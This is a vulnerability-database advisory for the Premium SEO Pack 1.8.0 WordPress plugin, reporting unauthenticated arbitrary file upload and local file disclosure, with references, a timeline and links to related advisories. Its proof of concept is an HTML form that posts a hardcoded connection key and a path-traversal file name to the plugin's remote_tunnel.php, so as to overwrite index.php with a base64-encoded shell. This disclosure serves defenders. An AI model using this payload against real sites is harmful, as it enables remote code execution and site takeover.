Premium SEO Pack 1.8.0 – Unauthenicated Arbitrary File Upload & LFD | Plugin Vulnerabilities

Description

This plugin is vulnerable to Local File Disclosure and Remote Code Execute via Arbitrary File Upload.

Proof of Concept

<form action="http://www.example.com/wp-content/plugins/premium-seo-pack/modules/remote_support/remote_tunnel.php" method="post" >
	<input type="hidden" name="connection_key" value="69efc4922575861f31125878597e97cf" >
	<input name="action" value="save_file" ><br>
	<input name="file" value="../../../index.php"><br>
	<textarea name="file_content" >BASE64 ENCODED SHELL</textarea><br>
	<input type="submit" ><br>
</form>

Affects Plugins

premium-seo-pack

No known fix

References

URL

https://packetstormsecurity.com/files/#131621/

URL

https://web.archive.org/web/20150914160857/https://research.evex.pw/?vuln=12

URL

https://codecanyon.net/item/premium-seo-pack-wordpress-plugin/6109437

Miscellaneous

Submitter

A. Samman

Submitter twitter

Verified

No

WPVDB ID

901b794f-5700-4c97-a936-770e6a69b7bd

Timeline

Publicly Published

2015-04-24 (about 11 years ago)

Added

2015-04-24 (about 11 years ago)

Last Updated

2019-10-21 (about 6 years ago)

Other

Published

Title

Published

2024-10-15

Title

File Manager Pro < 8.3.10 - Unauthenticated Limited JavaScript File Upload

Published

2016-04-23

Title

Tevolution < 2.3.0 - Unrestricted File Upload

Published

2025-09-05

Title

Multi Step Form < 1.7.26 - Authenticated (Admin+) Arbitrary File Upload

Published

2024-09-09

Title

Bit File Manager – 100% Free & Open Source File Manager and Code Editor for WordPress < 6.5.6 - Authenticated (Subscriber+) Arbitrary File Upload

Published

2025-06-02

Title

Bit File Manager – 100% Free & Open Source File Manager and Code Editor for WordPress < 6.8 - Authenticated (Subscriber+) Stored Cross-Site Scripting via SVG File Uploads